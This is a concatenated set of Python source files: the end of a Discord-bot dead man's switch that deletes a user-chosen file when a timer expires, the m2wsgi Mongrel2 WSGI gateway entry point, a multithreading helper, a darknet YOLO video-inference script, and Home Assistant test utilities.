    os.remove(filePath)  # Deletes path of file, DOES NOT ACTUALLY OVERWRITE/SECURE-DELETE FILE
    print("SWITCH ACTIVATED - LOCKDOWN MODE ENTERED")
    exit()
# Main function to setup encryption
def main():
    """Prompt for the file path and passphrase, then fire the payload when the timer expires.

    NOTE(review): `while timer():` runs a fresh 24-hour countdown on this
    thread (timer() only returns after it finishes) rather than polling the
    background timer_thread's time_out flag — confirm this is intended.
    """
    global time_out
    filePath = input("Insert file path: ")
    encryptPass = input("Insert pass to decrypt: ")
    while timer():  # Check when timer runs out
        print("Main got timeout true")
        FirePayload(filePath, encryptPass)
# Threading settings to run setup on background
# (not started here: on_ready() starts this thread once the bot is logged in)
main_thread = threading.Thread(target=main)
################################ DISCORD-BOT Section ###################################################################
client = commands.Bot(command_prefix='-')
token = 'putyourtokeninhere' # Put your discord bot login token in here
# bot set up
@client.event
async def on_ready():
    """Set idle presence and start the encryption-setup thread once logged in."""
    await client.change_presence(status=discord.Status.idle, activity=discord.Game('Admin Check'))
    main_thread.start()
    print("Bot is ready")
# someone enters server
@client.event
async def on_member_join(member):
    """Log member joins to stdout."""
    print(f'{member} has joined the server.')
# someone leaves server
@client.event
async def on_member_remove(member):
    """Log member departures to stdout."""
    print(f'{member} has left the server.')
# ping command
@client.command()
async def ping(ctx):
    """Reply with the bot's websocket latency in milliseconds."""
    await ctx.send(f'Command activated {round(client.latency * 1000)}ms')
# error handler
@client.event
async def on_command_error(ctx, error):
    """Report command errors to the invoking channel.

    discord.py dispatches this event as ``on_command_error(ctx, error)``;
    the original single-parameter signature raised TypeError on every
    command error instead of reporting it.
    """
    await ctx.send("Error")
    print("User error")
# clear command
@client.command()
async def clear(ctx, amount=5):
    """Delete the last `amount` messages (default 5) from the channel."""
    await ctx.channel.purge(limit=amount)
# time left before destruction
@client.command()
async def time(ctx):
    """Report the remaining countdown time.

    NOTE(review): this definition shadows the `time` name pulled in by
    `from time import *` at module level — confirm nothing else uses it.
    """
    global time_left
    await ctx.send(f'Time remaining before Self-destruction: {time_left}')
# deactivate command
@client.command()
async def l(ctx, *, pwd):
    """Reset the dead man's switch when the correct password is supplied.

    On success (and while the timer has not yet expired) the message with
    the password is purged and the countdown is reset to 24 hours; a wrong
    password purges the last 200 messages.
    """
    global time_out
    global time_left
    password = f'{pwd}'
    # The original called auth(password) twice and discarded the first
    # result; a single call avoids hashing the password redundantly.
    if auth(password):
        if time_out is False:
            await ctx.channel.purge(limit=1)
            await ctx.send(f'Switch reset')
            time_left = datetime.timedelta(hours=24)  # Set here time
        else:
            await ctx.send(f'Too late... ')
    else:
        await ctx.send(f'Wrong code, Impostor')
        await ctx.channel.purge(limit=200)
client.run(token)
|
__init__.py | """
m2wsgi: a mongrel2 => wsgi gateway and helper tools
====================================================
This module provides a WSGI gateway handler for the Mongrel2 webserver,
allowing easy deployment of python apps on Mongrel2. It provides full support
for chunked response encoding, streaming reads of large file uploads, and
pluggable backends for evented I/O a la eventlet.
You might also find its supporting classes useful for developing non-WSGI
handlers in python.
Command-line usage
------------------
The simplest way to use this package is as a command-line launcher::
m2wsgi dotted.app.name tcp://127.0.0.1:9999
This will connect to Mongrel2 on the specified request port and start handling
requests by passing them through the specified WSGI app. By default you will
get a single worker thread handling all requests, which is probably not what
you want; increase the number of threads like so::
m2wsgi --num-threads=5 dotted.app.name tcp://127.0.0.1:9999
If threads aren't your thing, you can just start several instances of the
handler pointing at the same zmq socket and get the same effect. Better yet,
you can use eventlet to shuffle the bits around like so::
m2wsgi --io=eventlet dotted.app.name tcp://127.0.0.1:9999
You can also use --io=gevent if that's how you roll. Contributions for
other async backends are most welcome.
Programmatic Usage
------------------
If you have more complicated needs, you can use m2wsgi from within your
application. The main class is 'WSGIHandler' which provides a simple
server interface. The equivalent of the above command-line usage is::
from m2wsgi.io.standard import WSGIHandler
handler = WSGIHandler(my_wsgi_app,"tcp://127.0.0.1:9999")
handler.serve()
There are a lot of "sensible defaults" being filled in here. It assumes
that the Mongrel2 recv socket is on the next port down from the send socket,
and that it's OK to connect the socket without a persistent identity.
For finer control over the connection between your handler and Mongrel2,
create your own Connection object. Here we use 127.0.0.1:9999 as the send
socket with identity AA-BB-CC, and use 127.0.0.2:9992 as the recv socket::
from m2wsgi.io.standard import WSGIHandler, Connection
conn = Connection(send_sock="tcp://AA-BB-CC@127.0.0.1:9999",
recv_sock="tcp://127.0.0.1:9992")
handler = WSGIHandler(my_wsgi_app,conn)
handler.serve()
If you're creating non-WSGI handlers for Mongrel2 you might find the following
classes useful:
:Connection: represents the connection from your handler to Mongrel2,
through which you can read requests and send responses.
:Client: represents a client connected to the server, to whom you
can send data at any time.
:Request: represents a client request to which you can asynchronously
send response data at any time.
:Handler: a base class for implementing handlers, with nothing
WSGI-specific in it.
Middleware
----------
If you need to add fancy features to the server, you can specify additional
WSGI middleware that should be applied around the application. For example,
m2wsgi provides a gzip-encoding middleware that can be used to compress
response data::
m2wsgi --middleware=GZipMiddleware
dotted.app.name tcp://127.0.0.1:9999
If you want additional compression at the expense of WSGI compliance, you
can also do some in-server buffering before the gzipping is applied::
m2wsgi --middleware=GZipMiddleware
--middleware=BufferMiddleware
dotted.app.name tcp://127.0.0.1:9999
The default module for loading middleware is m2wsgi.middleware; specify a
full dotted name to load a middleware class from another module.
Devices
-------
This module also provides a number of pre-built "devices" - stand-alone
executables designed to perform a specific common task. Currently available
devices are:
:dispatcher: implements a more flexible request-routing scheme than
the standard mongrel2 PUSH socket.
:response: implements a simple canned response, with ability to
interpolate variables from the request.
Don't we already have one of these?
-----------------------------------
Yes, there are several existing WSGI gateways for Mongrel2:
* https://github.com/berry/Mongrel2-WSGI-Handler
* https://bitbucket.org/dholth/mongrel2_wsgi
None of them fully met my needs. In particular, this package has transparent
support for:
* chunked response encoding
* streaming reads of large "async upload" requests
* pluggable IO backends (e.g. eventlet, gevent)
It's also designed from the ground up specifically for Mongrel2. This means
it gets a lot of functionality for free, and the code is simpler and lighter
as a result.
For example, there is no explicit management of a threadpool and request queue
as you might find in e.g. the CherryPy server. Instead, you just start up
as many threads as you need, have them all connect to the same handler socket,
and mongrel2 (via zmq) will automatically load-balance the requests to them.
Similarly, there's no fancy arrangement of master/worker processes to support
clean reloading of the handler; you just kill the old handler process and start
up a new one. Send m2wsgi a SIGHUP and it will automatically shutdown and
reincarnate itself for a clean restart.
Current bugs, limitations and things to do
------------------------------------------
It's not all perfect just yet, although it does seem to mostly work:
* Needs tests something fierce! I just have to find the patience to
write the necessary setup and teardown cruft.
* It would be great to grab connection details straight from the
mongrel2 config database. Perhaps a Connection.from_config method
with keywords to select the connection by handler id, host, route etc.
* support for expect-100-continue; this may have to live in mongrel2
"""
# Copyright (c) 2011, Ryan Kelly.
# All rights reserved; available under the terms of the MIT License.
# Semantic version components, combined into the canonical version string.
__ver_major__ = 0
__ver_minor__ = 5
__ver_patch__ = 2
__ver_sub__ = ""
__version__ = "%d.%d.%d%s" % (__ver_major__,__ver_minor__,__ver_patch__,__ver_sub__)
import sys
import os
import optparse
from subprocess import MAXFD
from textwrap import dedent
try:
import signal
except ImportError:
signal = None
from m2wsgi.util import load_dotted_name
def main(argv=None):
    """Entry-point for command-line use of m2wsgi.

    Parses options, resolves the requested Connection and WSGIHandler
    classes from the selected I/O module, applies any middleware, then
    serves requests on N threads until interrupted (SIGTERM stops,
    SIGHUP triggers a clean re-exec of the process).
    """
    op = optparse.OptionParser(usage=dedent("""
        usage: m2wsgi [options] dotted.app.name send_spec [recv_spec]
    """))
    op.add_option("","--io",default="standard",
                  help="the I/O module to use")
    op.add_option("","--num-threads",type="int",default=1,
                  help="the number of threads to use")
    op.add_option("","--conn-type",default="",
                  help="the type of connection to use")
    op.add_option("","--middleware",action="append",
                  help="any middleware to apply to the wsgi app")
    (opts,args) = op.parse_args(argv)
    # Sanity-check the arguments.
    if len(args) < 1:
        raise ValueError("you must specify the WSGI application")
    if opts.num_threads <= 0:
        raise ValueError("--num-threads must be positive")
    # Grab the connection and handler class from the IO module
    conn_args = args[1:]
    iomod = "%s.io.%s" % (__name__,opts.io,)
    iomod = __import__(iomod,fromlist=["WSGIHandler"])
    iomod.monkey_patch()
    WSGIHandler = iomod.WSGIHandler
    if not opts.conn_type:
        Connection = iomod.Connection
    else:
        # Resolve e.g. --conn-type=push to the module's PushConnection class.
        for nm in dir(iomod):
            if nm.lower() == opts.conn_type.lower() + "connection":
                Connection = getattr(iomod,nm)
                break
        else:
            raise ValueError("unknown connection type: %s" % (opts.conn_type,))
    # Now that things are monkey-patched, we can load the app
    # and the threading module.
    import threading
    app = load_dotted_name(args[0])
    assert callable(app), "the specified app is not callable"
    # Apply any middleware that was specified in the args
    if opts.middleware:
        for mname in reversed(opts.middleware):
            if "." not in mname:
                mname = "m2wsgi.middleware." + mname
            mcls = load_dotted_name(mname)
            app = mcls(app)
    # Try to clean up properly when killed.
    # We turn SIGTERM into a KeyboardInterrupt exception.
    # We catch SIGHUP and re-execute ourself as a simple reload mechanism.
    reload_the_process = []
    if signal is not None:
        def on_sigterm(*args):
            raise KeyboardInterrupt
        signal.signal(signal.SIGTERM,on_sigterm)
        def on_sighup(*args):
            reload_the_process.append(True)
            raise KeyboardInterrupt
        signal.signal(signal.SIGHUP,on_sighup)
    # Start the requested N handler threads.
    # N-1 are started in background threads, then one on this thread.
    handlers = []
    threads = []
    def run_handler():
        conn = Connection(*conn_args)
        handler = WSGIHandler(app,conn)
        handlers.append(handler)
        handler.serve()
    # range() instead of the Python-2-only xrange(); the thread count is
    # small so materializing the sequence is harmless on Python 2.
    for i in range(opts.num_threads - 1):
        t = threading.Thread(target=run_handler)
        t.start()
        threads.append(t)
    try:
        run_handler()
    except KeyboardInterrupt:
        if not reload_the_process:
            raise
    finally:
        # When the handler exits, shut down any background threads.
        for h in handlers:
            h.stop()
        for t in threads:
            t.join()
    # If we're doing a clean restart, close all fds and exec ourself.
    if reload_the_process:
        Connection.ZMQ_CTX.term()
        os.closerange(3,MAXFD)
        os.execv(sys.argv[0],sys.argv)
|
threads.py | # Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import queue
import threading
def execute_function_multithreaded(fn,
                                   args_list,
                                   block_until_all_done=True,
                                   max_concurrent_executions=1000):
    """
    Executes fn in multiple threads each with one set of the args in the
    args_list.

    :param fn: function to be executed
    :type fn:
    :param args_list:
    :type args_list: list(list)
    :param block_until_all_done: if is True, function will block until all the
    threads are done and will return the results of each thread's execution.
    :type block_until_all_done: bool
    :param max_concurrent_executions:
    :type max_concurrent_executions: int
    :return:
    If block_until_all_done is False, returns None. If block_until_all_done is
    True, function returns the dict of results.
        {
            index: execution result of fn with args_list[index]
        }
    :rtype: dict
    """
    result_queue = queue.Queue()
    worker_queue = queue.Queue()

    # Enqueue (index, args) pairs instead of appending the index onto the
    # caller's lists: the original mutated args_list's elements in place,
    # which corrupted the arguments on a second call with the same lists.
    for i, arg in enumerate(args_list):
        worker_queue.put((i, arg))

    def fn_execute():
        # Each worker drains the shared queue until it is empty.
        while True:
            try:
                exec_index, call_args = worker_queue.get(block=False)
            except queue.Empty:
                return
            res = fn(*call_args)
            result_queue.put((exec_index, res))

    threads = []
    number_of_threads = min(max_concurrent_executions, len(args_list))

    for _ in range(number_of_threads):
        thread = in_thread(target=fn_execute, daemon=not block_until_all_done)
        threads.append(thread)

    # Returns the results only if block_until_all_done is set.
    results = None
    if block_until_all_done:
        # Because join() cannot be interrupted by signal, a single join()
        # needs to be separated into join()s with timeout in a while loop.
        have_alive_child = True
        while have_alive_child:
            have_alive_child = False
            for t in threads:
                t.join(0.1)
                if t.is_alive():
                    have_alive_child = True
        results = {}
        while not result_queue.empty():
            item = result_queue.get()
            results[item[0]] = item[1]
        if len(results) != len(args_list):
            raise RuntimeError(
                'Some threads for func {func} did not complete '
                'successfully.'.format(func=fn.__name__))
    return results
def in_thread(target, args=(), name=None, daemon=True, silent=False):
    """
    Executes the given function in a background thread.

    :param target: function to execute
    :param args: function arguments, must be a tuple
    :param name: name of the thread
    :param daemon: run as daemon thread, do not block until thread is done
    :param silent: swallows exceptions raised by target silently
    :return: background thread
    :raises ValueError: if args is not a tuple
    """
    if not isinstance(args, tuple):
        raise ValueError('args must be a tuple, not {}, for a single argument use (arg,)'
                         .format(type(args)))
    if silent:
        def fn(*args):
            # Swallow only ordinary exceptions; a bare `except:` (as in the
            # original) would also trap SystemExit and KeyboardInterrupt.
            try:
                target(*args)
            except Exception:
                pass
    else:
        fn = target
    bg = threading.Thread(target=fn, args=args, name=name)
    bg.daemon = daemon
    bg.start()
    return bg
def on_event(event, func, args=(),
             stop=None, check_stop_interval_s=1.0,
             daemon=True, silent=False):
    """
    Runs func(*args) in a background thread once event is set.

    The background thread can be cancelled via the optional stop event,
    which is polled every check_stop_interval_s seconds while waiting.
    Exceptions raised by func are swallowed when silent is True.

    :param event: event that triggers func
    :type event: threading.Event
    :param func: function to trigger
    :param args: function arguments
    :param stop: event to stop the waiting thread
    :type stop: threading.Event
    :param check_stop_interval_s: interval in seconds to check the stop event
    :type check_stop_interval_s: float
    :param daemon: event thread is a daemon thread if set to True, otherwise stop event must be given
    :param silent: swallows exceptions raised by func silently
    :return: thread
    """
    if event is None:
        raise ValueError('Event must not be None')
    if not isinstance(args, tuple):
        raise ValueError('args must be a tuple, not {}, for a single argument use (arg,)'
                         .format(type(args)))
    if stop is None:
        # Without a stop event the thread may wait forever, so it must be
        # a daemon thread to avoid blocking interpreter shutdown.
        if not daemon:
            raise ValueError('Stop event must be given for non-daemon event thread')

        def waiter():
            event.wait()
            func(*args)
    else:
        def waiter():
            # Wake up periodically so the stop event is honoured even
            # while the trigger event has not fired yet.
            while not (event.is_set() or stop.is_set()):
                event.wait(timeout=check_stop_interval_s)
            if not stop.is_set():
                func(*args)

    return in_thread(waiter, daemon=daemon, silent=silent)
|
darknet_video.py | from ctypes import *
import random
import os
import cv2
import time
import darknet
import argparse
from threading import Thread, enumerate
from queue import Queue
from PIL import Image
import numpy as np
os.environ["CUDA_VISIBLE_DEVICES"] = "2"
# Dimensions of the input stream; populated in __main__ once the video
# source has been opened.
frame_width = None
# Bug fix: the original assigned `frame_width = None` twice; the second
# assignment was clearly intended to initialise frame_height.
frame_height = None
def parser():
    """Build the CLI for YOLO video inference and parse sys.argv."""
    ap = argparse.ArgumentParser(description="YOLO Object Detection")
    ap.add_argument("--input", type=str, default="visdrone_test.avi",
                    help="video source. If empty, uses webcam 0 stream")
    ap.add_argument("--out_filename", type=str, default="",
                    help="inference video name. Not saved if empty")
    ap.add_argument("--weights", default="backup/yolov4-tiny_csp_best.weights",
                    help="yolo weights path")
    ap.add_argument("--dont_show", action='store_true',
                    help="windown inference display. For headless systems")
    ap.add_argument("--ext_output", action='store_true',
                    help="display bbox coordinates of detected objects")
    ap.add_argument("--config_file", default="./cfg/yolov4-tiny_csp.cfg",
                    help="path to config file")
    ap.add_argument("--data_file", default="./data/drone.data",
                    help="path to data file")
    ap.add_argument("--thresh", type=float, default=.4,
                    help="remove detections with confidence below this value")
    return ap.parse_args()
def str2int(video_path):
    """
    argparse always yields strings although webcams use int indices (0, 1 ...).
    Return the int when video_path looks numeric, else the path unchanged.
    """
    try:
        index = int(video_path)
    except ValueError:
        return video_path
    return index
def check_arguments_errors(args):
    """Validate parsed CLI arguments.

    Raises AssertionError for an out-of-range threshold and ValueError for
    any non-existing config/weights/data/video path.
    """
    assert 0 < args.thresh < 1, "Threshold should be a float between zero and one (non-inclusive)"
    if not os.path.exists(args.config_file):
        raise ValueError("Invalid config path {}".format(os.path.abspath(args.config_file)))
    if not os.path.exists(args.weights):
        raise ValueError("Invalid weight path {}".format(os.path.abspath(args.weights)))
    if not os.path.exists(args.data_file):
        raise ValueError("Invalid data file path {}".format(os.path.abspath(args.data_file)))
    # Bug fix: the original tested `str2int(args.input) == str`, comparing a
    # value against the type object itself, which is always False — so the
    # video path was never validated. Only check the path when the input is
    # not a webcam index.
    try:
        int(args.input)
    except ValueError:
        if not os.path.exists(args.input):
            raise ValueError("Invalid video path {}".format(os.path.abspath(args.input)))
def set_saved_video(input_video, output_video, size):
    """Create a cv2.VideoWriter for output_video mirroring the input's FPS."""
    source_fps = int(input_video.get(cv2.CAP_PROP_FPS))
    codec = cv2.VideoWriter_fourcc(*"MJPG")
    return cv2.VideoWriter(output_video, codec, source_fps, size)
def video_capture(frame_queue, darknet_image_queue):
    """Capture thread: read frames from the module-global `cap`, convert
    BGR->RGB, resize to the network input size and feed the other threads.

    Feeds three queues: `orig_frame_queue` (full-size RGB frame),
    `frame_queue` (network-sized frame) and `darknet_image_queue`
    (the shared darknet image buffer filled with the resized frame).
    """
    while cap.isOpened():
        ret, frame = cap.read()
        if not ret:
            break  # end of stream or read failure
        frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
        # print(frame.shape)
        # Resize to the network's expected input size (module globals).
        frame_resized = cv2.resize(frame_rgb, (width, height), interpolation=cv2.INTER_LINEAR)
        ########## edited
        '''frame_resized = Image.fromarray(frame_rgb)
        frame_resized.thumbnail((width, height), Image.ANTIALIAS)
        frame_resize = np.asarray(frame_resized)'''
        orig_frame_queue.put(frame_rgb)
        frame_queue.put(frame_resized)
        # NOTE(review): `darknet_image` is a single shared buffer; with
        # darknet_image_queue bounded at maxsize=1 the consumer gates the
        # next copy, but concurrent reuse should be confirmed.
        darknet.copy_image_from_bytes(darknet_image, frame_resized.tobytes())
        darknet_image_queue.put(darknet_image)
    cap.release()
def inference(darknet_image_queue, detections_queue, fps_queue):
    """Inference thread: run YOLO on frames from darknet_image_queue and
    publish the detections; prints per-frame FPS to stdout.
    """
    while cap.isOpened():
        darknet_image = darknet_image_queue.get()
        prev_time = time.time()
        detections = darknet.detect_image(network, class_names, darknet_image, thresh=args.thresh)
        # FPS of the detector alone (excludes capture/drawing time).
        fps = int(1/(time.time() - prev_time))
        print("FPS: {}".format(fps))
        detections_queue.put(detections)
        # fps_queue.put(fps)
        darknet.print_detections(detections, args.ext_output)
    cap.release()
def drawing(frame_queue, detections_queue, fps_queue):
    """Drawing thread: overlay detections on frames, write the output video
    and optionally show an interactive window (ESC closes it).
    """
    random.seed(3)  # deterministic bbox colors
    video = set_saved_video(cap, args.out_filename, (width, height))
    while cap.isOpened():
        # ret, orignal_frame = cap.read()
        frame_resized = frame_queue.get()
        orignal_frame = orig_frame_queue.get()
        detections = detections_queue.get()
        # fps = fps_queue.get()
        if frame_resized is not None:
            # print('rfr', frame_width, frame_height)
            image = darknet.draw_boxes(detections, frame_resized, orignal_frame, class_colors)
            image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
            # print(image.shape)
            # image = cv2.resize(image, (1056, 720))
            # NOTE(review): out_filename defaults to "" which passes the
            # `is not None` test, so the writer is invoked even when no
            # output name was given — confirm intended.
            if args.out_filename is not None:
                video.write(image)
            if not args.dont_show:
                cv2.imshow('Inference', image)
            if cv2.waitKey(1) == 27:
                break
    cap.release()
    video.release()
    cv2.destroyAllWindows()
if __name__ == '__main__':
    # Queues connecting the capture, inference and drawing threads.
    frame_queue = Queue()
    orig_frame_queue = Queue()
    # maxsize=1 keeps the pipeline in lock-step: each stage waits for the
    # previous stage instead of buffering stale frames.
    darknet_image_queue = Queue(maxsize=1)
    detections_queue = Queue(maxsize=1)
    fps_queue = Queue(maxsize=1)
    args = parser()
    check_arguments_errors(args)
    network, class_names, class_colors = darknet.load_network(
        args.config_file,
        args.data_file,
        args.weights,
        batch_size=1
    )
    # Darknet doesn't accept numpy images.
    # Create one with image we reuse for each detect
    width = darknet.network_width(network)
    height = darknet.network_height(network)
    darknet_image = darknet.make_image(width, height, 3)
    input_path = str2int(args.input)
    cap = cv2.VideoCapture(input_path)
    frame_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))  # float
    frame_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))  # float
    # The pipeline threads communicate through the queues above and share
    # the module globals (cap, width, height, args, network, ...).
    Thread(target=video_capture, args=(frame_queue, darknet_image_queue)).start()
    Thread(target=inference, args=(darknet_image_queue, detections_queue, fps_queue)).start()
    Thread(target=drawing, args=(frame_queue, detections_queue, fps_queue)).start()
|
common.py | """Test the helper method for writing tests."""
import asyncio
import collections
from collections import OrderedDict
from contextlib import contextmanager
from datetime import timedelta
import functools as ft
from io import StringIO
import json
import logging
import os
import sys
import threading
from unittest.mock import MagicMock, Mock, patch
import uuid
from aiohttp.test_utils import unused_port as get_test_instance_port # noqa
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
auth_store,
models as auth_models,
permissions as auth_permissions,
providers as auth_providers,
)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import mqtt, recorder
from homeassistant.components.device_automation import ( # noqa: F401
_async_get_device_automation_capabilities as async_get_device_automation_capabilities,
_async_get_device_automations as async_get_device_automations,
)
from homeassistant.components.mqtt.models import Message
from homeassistant.config import async_process_component_config
from homeassistant.const import (
ATTR_DISCOVERED,
ATTR_SERVICE,
DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_PLATFORM_DISCOVERED,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import State
from homeassistant.helpers import (
area_registry,
device_registry,
entity,
entity_platform,
entity_registry,
intent,
restore_state,
storage,
)
from homeassistant.helpers.json import JSONEncoder
from homeassistant.setup import async_setup_component, setup_component
from homeassistant.util.async_ import run_callback_threadsafe
import homeassistant.util.dt as date_util
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.yaml.loader as yaml_loader
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = "https://example.com/app"
CLIENT_REDIRECT_URI = "https://example.com/app/callback"
def threadsafe_callback_factory(func):
    """Wrap a callback so it can be invoked from any thread.

    The wrapped callback must take `hass` as its first positional argument;
    the call is marshalled onto the hass event loop and its result returned.
    """

    @ft.wraps(func)
    def wrapper(*args, **kwargs):
        """Schedule func on the event loop and block for its result."""
        hass = args[0]
        future = run_callback_threadsafe(
            hass.loop, ft.partial(func, *args, **kwargs)
        )
        return future.result()

    return wrapper
def threadsafe_coroutine_factory(func):
    """Wrap a coroutine function so it can be called from any thread.

    The coroutine must take `hass` as its first positional argument; it is
    scheduled on the hass event loop and the wrapper blocks for the result.
    """

    @ft.wraps(func)
    def wrapper(*args, **kwargs):
        """Run the coroutine on the event loop and wait for its result."""
        hass = args[0]
        future = asyncio.run_coroutine_threadsafe(func(*args, **kwargs), hass.loop)
        return future.result()

    return wrapper
def get_test_config_dir(*add_path):
    """Return a path inside this package's testing_config directory."""
    base = os.path.dirname(__file__)
    return os.path.join(base, "testing_config", *add_path)
def get_test_home_assistant():
    """Return a Home Assistant object pointing at test config directory.

    Spins up a dedicated event loop in a background thread so the returned
    instance can be driven synchronously from test code; hass.start/stop
    are replaced with thread-safe wrappers.
    """
    if sys.platform == "win32":
        # Windows needs the proactor loop for subprocess/socket support.
        loop = asyncio.ProactorEventLoop()
    else:
        loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    hass = loop.run_until_complete(async_test_home_assistant(loop))
    stop_event = threading.Event()

    def run_loop():
        """Run event loop."""
        # pylint: disable=protected-access
        # Re-bind the loop's owning thread so call_soon_threadsafe checks pass.
        loop._thread_ident = threading.get_ident()
        loop.run_forever()
        stop_event.set()

    orig_stop = hass.stop

    def start_hass(*mocks):
        """Start hass."""
        asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result()

    def stop_hass():
        """Stop hass and wait for the loop thread to wind down."""
        orig_stop()
        stop_event.wait()
        loop.close()

    hass.start = start_hass
    hass.stop = stop_hass
    threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
    return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop):
    """Return a Home Assistant object pointing at test config dir.

    Instruments the instance so Mock jobs/tasks are resolved without the
    executor, applies deterministic test configuration and registers a
    cleanup that removes the instance from INSTANCES on close.
    """
    hass = ha.HomeAssistant(loop)
    store = auth_store.AuthStore(hass)
    hass.auth = auth.AuthManager(hass, store, {}, {})
    ensure_auth_manager_loaded(hass.auth)
    INSTANCES.append(hass)
    orig_async_add_job = hass.async_add_job
    orig_async_add_executor_job = hass.async_add_executor_job
    orig_async_create_task = hass.async_create_task

    def async_add_job(target, *args):
        """Add job."""
        # Mocks cannot run in the executor; wrap their immediate result
        # in a coroutine instead.
        if isinstance(target, Mock):
            return mock_coro(target(*args))
        return orig_async_add_job(target, *args)

    def async_add_executor_job(target, *args):
        """Add executor job."""
        if isinstance(target, Mock):
            return mock_coro(target(*args))
        return orig_async_add_executor_job(target, *args)

    def async_create_task(coroutine):
        """Create task."""
        if isinstance(coroutine, Mock):
            return mock_coro()
        return orig_async_create_task(coroutine)

    hass.async_add_job = async_add_job
    hass.async_add_executor_job = async_add_executor_job
    hass.async_create_task = async_create_task
    # Deterministic test configuration; skip_pip avoids installs in tests.
    hass.config.location_name = "test home"
    hass.config.config_dir = get_test_config_dir()
    hass.config.latitude = 32.87336
    hass.config.longitude = -117.22743
    hass.config.elevation = 0
    hass.config.time_zone = date_util.get_time_zone("US/Pacific")
    hass.config.units = METRIC_SYSTEM
    hass.config.skip_pip = True
    hass.config_entries = config_entries.ConfigEntries(hass, {})
    hass.config_entries._entries = []
    hass.config_entries._store._async_ensure_stop_listener = lambda: None
    hass.state = ha.CoreState.running
    # Mock async_start
    orig_start = hass.async_start

    async def mock_async_start():
        """Start the mocking."""
        # We only mock time during tests and we want to track tasks
        with patch("homeassistant.core._async_create_timer"), patch.object(
            hass, "async_stop_track_tasks"
        ):
            await orig_start()

    hass.async_start = mock_async_start

    @ha.callback
    def clear_instance(event):
        """Clear global instance."""
        INSTANCES.remove(hass)

    hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
    return hass
def async_mock_service(hass, domain, service, schema=None):
    """Set up a fake service & return a calls log list to this service."""
    calls = []

    @ha.callback
    def mock_service_log(call):  # pylint: disable=unnecessary-lambda
        """Mock service call."""
        # Record every invocation so tests can assert on it.
        calls.append(call)

    hass.services.async_register(domain, service, mock_service_log, schema=schema)
    return calls


# Synchronous wrapper usable from threads other than the event loop's.
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
    """Set up a fake intent handler; return the list of handled intents."""
    intents = []

    class MockIntentHandler(intent.IntentHandler):
        # Handles exactly the requested intent type.
        intent_type = intent_typ

        @asyncio.coroutine
        def async_handle(self, intent):
            """Handle the intent."""
            intents.append(intent)
            return intent.create_response()

    intent.async_register(hass, MockIntentHandler())
    return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
    """Fire the MQTT message."""
    # The real MQTT stack delivers bytes; encode str payloads the same way.
    if isinstance(payload, str):
        payload = payload.encode("utf-8")
    msg = Message(topic, payload, qos, retain)
    hass.data["mqtt"]._mqtt_handle_message(msg)


# Synchronous wrapper usable from threads other than the event loop's.
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, time):
    """Fire a time changed event with the given time converted to UTC."""
    hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(time)})


# Synchronous wrapper usable from threads other than the event loop's.
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
    """Fire a platform-discovered event on the bus (sync version)."""
    payload = {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
    hass.bus.fire(EVENT_PLATFORM_DISCOVERED, payload)
@ha.callback
def async_fire_service_discovered(hass, service, info):
    """Fire a platform-discovered event on the bus (async version)."""
    payload = {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
    hass.bus.async_fire(EVENT_PLATFORM_DISCOVERED, payload)
def load_fixture(filename):
    """Return the contents of a file in the fixtures directory as text."""
    fixtures_dir = os.path.join(os.path.dirname(__file__), "fixtures")
    with open(os.path.join(fixtures_dir, filename), encoding="utf-8") as fobj:
        return fobj.read()
def mock_state_change_event(hass, new_state, old_state=None):
    """Fire a state changed event for the given states on the bus."""
    event_data = {"entity_id": new_state.entity_id, "new_state": new_state}
    if old_state:
        event_data["old_state"] = old_state
    hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
async def async_mock_mqtt_component(hass, config=None):
    """Mock the MQTT component.

    Sets up the real mqtt integration against a patched paho client and
    replaces hass.data["mqtt"] with a spy MagicMock wrapping the original.
    """
    if config is None:
        config = {mqtt.CONF_BROKER: "mock-broker"}

    async def _async_fire_mqtt_message(topic, payload, qos, retain):
        # Loop published messages straight back as incoming messages.
        async_fire_mqtt_message(hass, topic, payload, qos, retain)

    with patch("paho.mqtt.client.Client") as mock_client:
        mock_client().connect.return_value = 0
        mock_client().subscribe.return_value = (0, 0)
        mock_client().unsubscribe.return_value = (0, 0)
        mock_client().publish.return_value = (0, 0)
        mock_client().publish.side_effect = _async_fire_mqtt_message
        result = await async_setup_component(hass, mqtt.DOMAIN, {mqtt.DOMAIN: config})
        assert result
        await hass.async_block_till_done()
    # Wrap in a MagicMock so tests can assert on calls while keeping the
    # original behavior through wraps=.
    hass.data["mqtt"] = MagicMock(
        spec_set=hass.data["mqtt"], wraps=hass.data["mqtt"]
    )
